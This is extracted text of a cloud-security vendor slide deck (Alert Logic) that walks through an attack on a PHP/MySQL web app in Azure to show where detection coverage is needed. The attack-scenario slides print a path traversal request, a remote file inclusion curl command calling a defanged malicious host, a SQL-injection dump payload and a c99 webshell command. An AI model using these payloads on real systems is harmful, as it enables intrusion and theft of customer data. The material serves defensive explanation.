realities of security in the cloud
TRANSCRIPT
REALITIES OF SECURITY IN THE CLOUD
Mark Brooks
VP, Sales Engineering, Alert Logic
Security is a challenge.
Security Has Changed
• Security Monitoring
• Log Analysis
• Vulnerability Scanning
• Network Threat Detection
• Security Monitoring
• Secure Coding and Best Practices
• Software and Virtual Patching
• Configuration Management
• Access Management (including multi-
factor authentication)
• Access Management
• Configuration Hardening
• Patch Management
• TLS/SSL Encryption
• Network Security
Configuration
• Web Application Firewall
• Vulnerability Scanning
• Application level attack monitoring
• Hypervisor Management
• System Image Library
• Root Access for Customers
• Managed Patching (PaaS, not IaaS)
• Logical Network Segmentation
• Perimeter Security Services
• External DDOS, spoofing, and
scanning monitored
APPS
CUSTOMER ALERT LOGICMICROSOFT
VIRTUAL MACHINES
NETWORKING
INFRASTRUCTURE
SERVICES
Security in the Cloud is a Shared Responsibility
Let’s talk about security coverage.
Tame the Beast
Industry Challenge: The Good, the Bad and the Ugly
Known Good
Known Bad
Suspicious
AllowIdentify | Tune | Permit
BlockDrop | Reconfigure
Application Stack
Web Apps
Server-side Apps
App Frameworks
Dev Platforms
Databases
Server OS
Hypervisor
Hardware Classification Action
HUMAN EXPERTREQUIRED
Classic 3-Tier Web Application Key Target Assets
Key target assets for attackAcross the Full Stack
1. Custom application
2. Web server implementation
Apache, IIS, NGINGX
3. Application server implementation
Tomcat, Jboss, Jetty, ASP
4. Web server frameworks and
languages
Struts, PHP, Java
5. DatabasesmySql, Oracle, MSSQL,..
6. Azure ServicesVMs, Storage
Azure VMs
Azure VMs
VNET
Traffic
Manager
Users Internet
gatewayLoad
Balancers
DB instance
DB instance
Ava
ila
bility z
on
e A
Ava
ila
bility z
on
e B
VMScale
Sets
Web App Server
VMScale
Sets
Storage
Blob
Azure VMs
Azure VMs
An attack scenario - Recon
VNET
Traffic Manager
Internet
gatewayLB
mySQL instance
On linux
Ava
ila
bility z
on
e A
Ava
ila
bility z
on
e B
Storage
Bastion
Host
PHP
Application
On Linux
1 – Performs low-frequency app-scan
2 – Tests path traversal and enumerates directories
3 – Tests remote file inclusion
Recon
Recon• low slow application level scan
• Attacker learns PHP app, on linux, likely
mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=..
/../../../etc
• Path traversal is successful. Attacker
enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious
[dot] com/test.php' http [://] mysite [dot]
com/wp-content/plugins/site-
import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app,
prone to both smash’n grab attacks as more
persistent attack approaches
Entry and data exfiltration• Attacker launches a series of SQL-I injection discovery
attempts
• Gets a dump-in-one-shot attack and gets full table returnhttp://victim.com/report.php?id=23 and(select (@a) from
(select(@a:=0x00),(select (@a) from (information_schema.schemata)where
(@a)in (@a:=concat(@a,schema_name,'<br>'))))a)
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
An attack scenario – opportunistic exfiltration
VNET
Traffic Manager
Internet
gateway
LB
mySQL instance
On linux
Ava
ila
bility z
on
e A
Ava
ila
bility z
on
e B
Storage
Bastion
Host
PHP
Application
On Linux
4 - SQL-I data extraction attack
Recon• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerabilityCurl -X POST -F 'url=http [://] malicious [dot] com/test.php' http
[://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
Entry/Exfil
VNET
Traffic Manager
Internet
gateway
LB
mySQL instance
On linux
Ava
ila
bility z
on
e A
Ava
ila
bility z
on
e B
Storage
Bastion
Host
PHP
Application
On Linux
5 - Webshell injection
6 - Commanding through Shell
Command and control (C&C)• Attacker uploads c99 webshell via RFI vulnerability
• Persistent foothold for lateral movement establishedcurl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64='
-F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F
'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http
[://] mysite [dot] com/path/to/c99
Attacker achievements: obtained foothold for further action and lateral
movement
Entry and data exfiltration• Attacker launches a series of SQL-I injection attempts
• Gets a dump-in-one-shot attack and gets full table returnAttacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
Recon• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability (RFI)
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
An attack scenario – persistent foothold
Command and control
Deep
Application
threat visibility
Network inspection
Expert
SOC
Analysis of
Findings
Network,
system,
application
infrastructure
threat visibility
Alert Logic’s Approach
AuditLogs
Co
nfi
g&
Vuln
Ass
ess
men
tFoundation
Asset and
exposure
visibility
Log Collection
HTTP Inspection
Expert
Curation,
R&D of
Content and
Intel
Analytics
and
Machine
Learning
Content
and
Intel
Application
level Web
Attacks
OWASP Top
10
Attacks against
vulnerable
platforms and
libraries
Attacks against
miscon-
figurations
Coverage needed for this scenario
Low
slow
scan
Path
traver
sal
RFI SQLiWeb
shell
ReconEntry
ExfilC&COverall combined
coverage scorecard
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
How much can we see?
AuditLogs
Coverage needed for this scenario
FoundationAsset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLiWeb
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
ReconEntry
ExfilC&C
AuditLogs
Co
nfi
g&
Vu
lnA
ssess
men
t
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
FoundationAsset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLiWeb
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
ReconEntry
ExfilC&C
Network inspection
AuditLogs
Co
nfi
g&
Vu
lnA
ssess
men
t
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
Deep
Application
threat visibility
Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
FoundationAsset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLiWeb
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Deep HTTP inspection
on requests and
responses, learning and
anomaly detection
deepens coverage for
whole classes of
application attacks
ReconEntry
ExfilC&C
Network inspection
AuditLogs
Co
nfi
g&
Vu
lnA
ssess
men
t
Log Collection
HTTP
Inspection
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
SECURITYEXPERTS
Integrated Security Model
IncidentInvestigation
SystemVisual | Context | Hunt
Data & EventSources
Assets | Config | Logs
Automatic Detection
Block | Alert | Log
ML Algorithms
Rules & Analytics
Security
Researchers
Data
Scientists
Software
Programmers
Integrated: Infrastructure | Content | Human Experts
Security
Analysts
We designed security for cloud and hybrid environments
GET STARTED IN MINUTESMAINTAIN COVERAGE AT
CLOUD SCALEKEEP PRODUCTION FLOWING
with modular services that
grow with you
Comply
with integration to cloud APIs
and DevOps automation
with auto-scaling support and
out-of-band detection
Single pane of glass for workload and application security
across cloud, hosted & on-premises
Leaders
28
8
6
4
10
25
3
5
5
11
8
10
15
24
Other
Amazon
Check Point
Chronicle Data
Cisco
Fortinet
Intel Security
Okta
Symantec
Barricade
JumpCloud
Evident.io
Palerra
Microsoft
CloudPassage
CloudCheckr
FortyCloud
ThreatStack
Alert Logic
A recognized security leader
“Alert Logic has a
head start in the cloud,
and it shows.”
PETER STEPHENSON
SC Magazine review
“…the depth and breadth
of the offering’s analytics
and threat management
process goes beyond
anything we’ve seen…”Who is your primary
in-use vendor for Cloud
Infrastructure Security?
Who are the top vendors
in consideration for Cloud
Infrastructure Security?
Alert Logic
Over 4,000 worldwide customers
AUTOMOTIVE HEALTHCARE
EDUCATION
FINANCIAL SERVICES
MANUFACTURING
MEDIA/PUBLISHING
RETAIL/E-COMMERCE
ENERGY & CHEMICALS
TECHNOLOGY & SERVICES
GOV’T / NON-PROFIT
Thank You.